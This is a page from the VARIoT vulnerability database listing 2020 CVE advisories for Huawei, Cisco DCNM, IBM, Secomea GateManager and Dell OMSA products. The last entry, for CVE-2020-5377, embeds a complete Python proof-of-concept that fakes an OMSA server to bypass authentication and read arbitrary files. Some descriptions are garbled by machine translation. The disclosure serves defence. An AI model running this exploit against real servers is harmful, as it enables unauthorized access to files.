VARIoT IoT vulnerabilities database

Affected products: vendor, model and version
CWE format is 'CWE-number'. Threat type can be: remote or local
Look up free text in title and description

VAR-202007-1262 CVE-2020-9249 HUAWEI P30 Vulnerability related to input confirmation on smartphones CVSS V2: 3.3
CVSS V3: 6.5
Severity: MEDIUM
HUAWEI P30 smartphones with versions earlier than 10.1.0.160(C00E160R2P11) have a denial of service vulnerability. A module does not deal with mal-crafted messages and it leads to memory leak. Attackers can exploit this vulnerability to make the device denial of service.Affected product versions include: HUAWEI P30 versions Versions earlier than 10.1.0.160(C00E160R2P11). HUAWEI P30 There is a vulnerability related to input confirmation on smartphones.Service operation interruption (DoS) It may be put into a state. Huawei P30 is a smart phone of China's Huawei (Huawei) company
VAR-202012-1394 CVE-2020-9247 plural  Huawei  Classic buffer overflow vulnerability in the product CVSS V2: 6.8
CVSS V3: 7.8
Severity: HIGH
There is a buffer overflow vulnerability in several Huawei products. The system does not sufficiently validate certain configuration parameter which is passed from user that would cause buffer overflow. The attacker should trick the user into installing and running a malicious application with a high privilege, successful exploit may cause code execution. Affected product include Huawei HONOR 20 PRO, Mate 20, Mate 20 Pro, Mate 20 X, P30, P30 Pro, Hima-L29C, Laya-AL00EP, Princeton-AL10B, Tony-AL00B, Yale-L61A, Yale-TL00B and YaleP-AL10B. plural Huawei The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state
VAR-202007-1058 CVE-2020-3460 Cisco Data Center Network Manager Cross-site scripting vulnerability in CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by intercepting a request from a user and injecting malicious data into an HTTP header. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information. The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions
VAR-202007-1087 CVE-2020-4185 IBM Security Guardium Vulnerability in using cryptographic algorithms in CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
IBM Security Guardium 10.5, 10.6, and 11.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 174803. Vendor exploits this vulnerability IBM X-Force ID: 174803 It is published as.Information may be obtained. IBM Security Guardium is a platform that provides data protection functions from IBM in the United States. The platform includes functions such as custom UI, report management, and streamlined audit process construction. Attackers can use this vulnerability to obtain sensitive information
VAR-202007-1042 CVE-2020-3376 Cisco Data Center Network Manager Vulnerability regarding lack of authentication for critical features in CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in the Device Manager application of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions on an affected device. The vulnerability is due to a failure in the software to perform proper authentication. An attacker could exploit this vulnerability by browsing to one of the hosted URLs in Cisco DCNM. A successful exploit could allow the attacker to interact with and use certain functions within the Cisco DCNM. (DoS) It may be put into a state. The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions. The following products and versions are affected: Cisco DCNM Release 11.0(1), Release 11.1(1), Release 11.2(1), Release 11.3(1)
VAR-202007-1043 CVE-2020-3377 Cisco Data Center Network Manager In OS Command injection vulnerabilities CVSS V2: 6.5
CVSS V3: 8.8
Severity: HIGH
A vulnerability in the Device Manager application of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to inject arbitrary commands on the affected device. The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted arguments to a specific field within the application. A successful exploit could allow the attacker to run commands as the administrator on the DCNM. (DoS) It may be put into a state. The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions. The following products and versions are affected: Cisco DCNM Release 11.0(1), Release 11.1(1), Release 11.2(1), Release 11.3(1)
VAR-202007-1048 CVE-2020-3382 Cisco Data Center Network Manager Vulnerability in using hard-coded credentials in CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in the REST API of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability exists because different installations share a static encryption key. An attacker could exploit this vulnerability by using the static key to craft a valid session token. A successful exploit could allow the attacker to perform arbitrary actions through the REST API with administrative privileges. (DoS) It may be put into a state. Cisco Data Center Network Manager (DCNM) is a data center management system of Cisco (Cisco). The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions. The following products and versions are affected: Cisco DCNM Release 11.0(1), Release 11.1(1), Release 11.2(1), Release 11.3(1)
VAR-202007-1052 CVE-2020-3386 Cisco Data Center Network Manager Unauthorized authentication vulnerability in CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
A vulnerability in the REST API endpoint of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker with a low-privileged account to bypass authorization on the API of an affected device. The vulnerability is due to insufficient authorization of certain API functions. An attacker could exploit this vulnerability by sending a crafted request to the API using low-privileged credentials. A successful exploit could allow the attacker to perform arbitrary actions through the REST API with administrative privileges. Cisco Data Center Network Manager (DCNM) Exists in a fraudulent authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions
VAR-202007-1060 CVE-2020-3462 Cisco Data Center Network Manager In SQL Injection vulnerabilities CVSS V2: 6.5
CVSS V3: 6.3
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain and modify sensitive information that is stored in the underlying database. (DoS) It may be put into a state. The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions. The vulnerability is caused by the fact that the program does not correctly verify the parameters submitted by the user
VAR-202007-1059 CVE-2020-3461 Cisco Data Center Network Manager Vulnerability regarding lack of authentication for critical features in CVSS V2: 5.0
CVSS V3: 5.3
Severity: MEDIUM
A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to obtain confidential information from an affected device. The vulnerability is due to missing authentication on a specific part of the web-based management interface. An attacker could exploit this vulnerability by sending a crafted request to the interface. A successful exploit could allow the attacker to read confidential information from an affected device. The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions
VAR-202007-1050 CVE-2020-3384 Cisco Data Center Network Manager Vulnerability in CVSS V2: 6.0
CVSS V3: 8.2
Severity: HIGH
A vulnerability in specific REST API endpoints of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to inject arbitrary commands on the underlying operating system with the privileges of the logged-in user. The vulnerability is due to insufficient validation of user-supplied input to the API. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to inject arbitrary commands on the underlying operating system. (DoS) It may be put into a state. The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions. The REST API endpoints in Cisco DCNM versions prior to 11.4(1) have a security vulnerability due to the program not properly validating user input
VAR-202007-1049 CVE-2020-3383 Cisco Data Center Network Manager Path traversal vulnerability in CVSS V2: 9.0
CVSS V3: 8.8
Severity: HIGH
A vulnerability in the archive utility of Cisco Data Center Network Manager (DCNM) could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. The vulnerability is due to a lack of proper input validation of paths that are embedded within archive files. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to write arbitrary files in the system with the privileges of the logged-in user. (DoS) It may be put into a state. Cisco Data Center Network Manager (DCNM) is a data center management system of Cisco (Cisco). The system is available for Cisco Nexus and MDS series switches and provides storage visualization, configuration and troubleshooting functions
VAR-202007-1261 CVE-2020-9248 Huawei FusionCompute Unauthorized authentication vulnerability in CVSS V2: 4.6
CVSS V3: 6.7
Severity: MEDIUM
Huawei FusionComput 8.0.0 have an improper authorization vulnerability. A module does not verify some input correctly and authorizes files with incorrect access. Attackers can exploit this vulnerability to launch privilege escalation attack. This can compromise normal service. Huawei FusionCompute Exists in a fraudulent authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Huawei FusionCompute is a computer virtualization engine developed by Huawei in China. The product provides Virtual Resource Manager (VRM) and Compute Node Agent (CNA), etc. Attackers can use this vulnerability to elevate their privileges and affect the normal service of the device
VAR-202007-1041 CVE-2020-3375 Cisco SD-WAN Solution Buffer error vulnerability in software CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A vulnerability in Cisco SD-WAN Solution Software could allow an unauthenticated, remote attacker to cause a buffer overflow on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted traffic to an affected device. A successful exploit could allow the attacker to gain access to information that they are not authorized to access, make changes to the system that they are not authorized to make, and execute commands on an affected system with privileges of the root user. (DoS) It may be put into a state. Cisco SD-WAN Solution is a set of network expansion solutions of Cisco (Cisco)
VAR-202007-1040 CVE-2020-3374 Cisco SD-WAN vManage Software fraudulent authentication vulnerabilities CVSS V2: 9.0
CVSS V3: 9.9
Severity: CRITICAL
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization, enabling them to access sensitive information, modify the system configuration, or impact the availability of the affected system. The vulnerability is due to insufficient authorization checking on the affected system. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to gain privileges beyond what would normally be authorized for their configured user authorization level. The attacker may be able to access sensitive information, modify the system configuration, or impact the availability of the affected system. Cisco SD-WAN vManage The software contains vulnerabilities related to unauthorized authentication.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Cisco SD-WAN vManage Software is a management software for SD-WAN (Software Defined Wide Area Network) solutions from Cisco
VAR-202008-0163 CVE-2020-14508 Secomea Made GateManager Multiple vulnerabilities in CVSS V2: 7.5
CVSS V3: 9.8
Severity: Critical
GateManager versions prior to 9.2c, The affected product is vulnerable to an off-by-one error, which may allow an attacker to remotely execute arbitrary code or cause a denial-of-service condition. GateManager Is Secomea Provided by the company VPN It is a server. GateManager The following multiple vulnerabilities exist in. *NULL Part-Time Job Or NUL Improper invalidation of characters (CWE-158) - CVE-2020-14500 * Judgment of boundary conditions (CWE-193) - CVE-2020-14508 * Use of hard-coded credentials (CWE-798) - CVE-2020-14510 * Use of inadequately strong password hashes (CWE-916) - CVE-2020-14512The expected impact depends on each vulnerability, but it may be affected as follows. * A remote third party sends a negative value and overwrites any data - CVE-2020-14500 * A remote third party Off-by-one Causes an error, executes arbitrary code, or is in a denial of service (DoS) To be - CVE-2020-14508 *Telnet Credentials are hard coded by a remote third party who does not have administrator privileges root Command is executed with authority - CVE-2020-14510 * The user's password is referenced by a remote third party due to the use of a weak hash algorithm. - CVE-2020-14512
VAR-202008-1219 CVE-2020-14510 Secomea GateManager trust management issue vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: Critical
GateManager versions prior to 9.2c, The affected product contains a hard-coded credential for telnet, allowing an unprivileged attacker to execute commands as root. GateManager Is Secomea Provided by the company VPN It is a server. GateManager The following multiple vulnerabilities exist in. *NULL Part-Time Job Or NUL Improper invalidation of characters (CWE-158) - CVE-2020-14500 * Judgment of boundary conditions (CWE-193) - CVE-2020-14508 * Use of hard-coded credentials (CWE-798) - CVE-2020-14510 * Use of inadequately strong password hashes (CWE-916) - CVE-2020-14512The expected impact depends on each vulnerability, but it may be affected as follows. * A remote third party sends a negative value and overwrites any data - CVE-2020-14500 * A remote third party Off-by-one Causes an error, executes arbitrary code, or is in a denial of service (DoS) To be - CVE-2020-14508 *Telnet Credentials are hard coded by a remote third party who does not have administrator privileges root Command is executed with authority - CVE-2020-14510 * The user's password is referenced by a remote third party due to the use of a weak hash algorithm. - CVE-2020-14512. Secomea GateManager is a remote access server product of Secomea, Denmark. There is a trust management vulnerability in Secomea GateManager versions prior to 9.2c, which is caused by the program using hard-coded credentials. A remote attacker can use this vulnerability to execute commands with root privileges
VAR-202008-0164 CVE-2020-14512 Secomea Made GateManager Multiple vulnerabilities in CVSS V2: 5.0
CVSS V3: 7.5
Severity: Critical
GateManager versions prior to 9.2c, The affected product uses a weak hash type, which may allow an attacker to view user passwords. GateManager Is Secomea Provided by the company VPN It is a server. GateManager The following multiple vulnerabilities exist in. *NULL Part-Time Job Or NUL Improper invalidation of characters (CWE-158) - CVE-2020-14500 * Judgment of boundary conditions (CWE-193) - CVE-2020-14508 * Use of hard-coded credentials (CWE-798) - CVE-2020-14510 * Use of inadequately strong password hashes (CWE-916) - CVE-2020-14512The expected impact depends on each vulnerability, but it may be affected as follows. * A remote third party sends a negative value and overwrites any data - CVE-2020-14500 * A remote third party Off-by-one Causes an error, executes arbitrary code, or is in a denial of service (DoS) To be - CVE-2020-14508 *Telnet Credentials are hard coded by a remote third party who does not have administrator privileges root Command is executed with authority - CVE-2020-14510 * The user's password is referenced by a remote third party due to the use of a weak hash algorithm. - CVE-2020-14512. Secomea GateManager is a remote access server product of Secomea, Denmark
VAR-202008-0162 CVE-2020-14500 Secomea Made GateManager Multiple vulnerabilities in CVSS V2: 7.5
CVSS V3: 9.8
Severity: Critical
Secomea GateManager all versions prior to 9.2c, An attacker can send a negative value and overwrite arbitrary data. GateManager Is Secomea Provided by the company VPN It is a server. GateManager The following multiple vulnerabilities exist in. *NULL Part-Time Job Or NUL Improper invalidation of characters (CWE-158) - CVE-2020-14500 * Judgment of boundary conditions (CWE-193) - CVE-2020-14508 * Use of hard-coded credentials (CWE-798) - CVE-2020-14510 * Use of inadequately strong password hashes (CWE-916) - CVE-2020-14512The expected impact depends on each vulnerability, but it may be affected as follows. * A remote third party sends a negative value and overwrites any data - CVE-2020-14500 * A remote third party Off-by-one Causes an error, executes arbitrary code, or is in a denial of service (DoS) To be - CVE-2020-14508 *Telnet Credentials are hard coded by a remote third party who does not have administrator privileges root Command is executed with authority - CVE-2020-14510 * The user's password is referenced by a remote third party due to the use of a weak hash algorithm. - CVE-2020-14512
VAR-202007-1286 CVE-2020-5377 Dell EMC OpenManage Server Administrator Path traversal vulnerability in CVSS V2: 6.4
CVSS V3: 9.1
Severity: CRITICAL
Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station. The solution supports online diagnosis, system operation detection, equipment management, etc. A remote attacker could exploit this vulnerability to gain access to the file system. # CVE: CVE-2020-5377 # This is a proof of concept for CVE-2020-5377, an arbitrary file read in Dell OpenManage Administrator # Proof of concept written by: David Yesland @daveysec with Rhino Security Labs # More information can be found here: # A patch for this issue can be found here: # https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability from xml.sax.saxutils import escape import BaseHTTPServer import requests import thread import ssl import sys import re import os import urllib3 urllib3.disable_warnings() if len(sys.argv) < 3: print 'Usage python auth_bypass.py <yourIP> <targetIP>:<targetPort>' exit() #This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909 #Also check out https://github.com/hantwister/FakeDellOM class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_POST(s): data = '' content_len = int(s.headers.getheader('content-length', 0)) post_body = s.rfile.read(content_len) s.send_response(200) s.send_header("Content-type", "application/soap+xml;charset=UTF-8") s.end_headers() if "__00omacmd=getuserrightsonly" in post_body: data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>") if "__00omacmd=getaboutinfo " in post_body: data = escape("<ProductVersion>6.0.3</ProductVersion>") if data: requid = re.findall('>uuid:(.*?)<',post_body)[0] s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?> <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule"> <s:Header> <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To> <wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo> <wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID> </s:Header> <s:Body> <n1:SendCmd_OUTPUT> <n1:ResultCode>0</n1:ResultCode> <n1:ReturnValue>'''+data+'''</n1:ReturnValue> </n1:SendCmd_OUTPUT> </s:Body> </s:Envelope>''') else: s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''') def log_message(self, format, *args): return createdCert = False if not os.path.isfile('./server.pem'): print '[-] No server.pem certifcate file found. Generating one...' os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"') createdCert = True def startServer(): server_class = BaseHTTPServer.HTTPServer httpd = httpd = server_class(('0.0.0.0', 443), MyHandler) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever() thread.start_new_thread(startServer,()) myIP = sys.argv[1] target = sys.argv[2] def bypassAuth(): values = {} url = "https://{}/LoginServlet?flag=true&managedws=false".format(target) data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"} r = requests.post(url, data=data, verify=False, allow_redirects=False) cookieheader = r.headers['Set-Cookie'] sessionid = re.findall('JSESSIONID=(.*?);',cookieheader) pathid = re.findall('Path=/(.*?);',cookieheader) values['sessionid'] = sessionid[0] values['pathid'] = pathid[0] return values ids = bypassAuth() sessionid = ids['sessionid'] pathid = ids['pathid'] print "Session: "+sessionid print "VID: "+pathid def readFile(target,sessid,pathid): while True: file = raw_input('file > ') url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file) cookies = {"JSESSIONID": sessid} r = requests.get(url, cookies=cookies, verify=False) print 'Reading contents of {}:\n{}'.format(file,r.content) def getPath(path): if path.lower().startswith('c:\\'): path = path[2:] path = path.replace('\\','/') return path readFile(target,sessionid,pathid)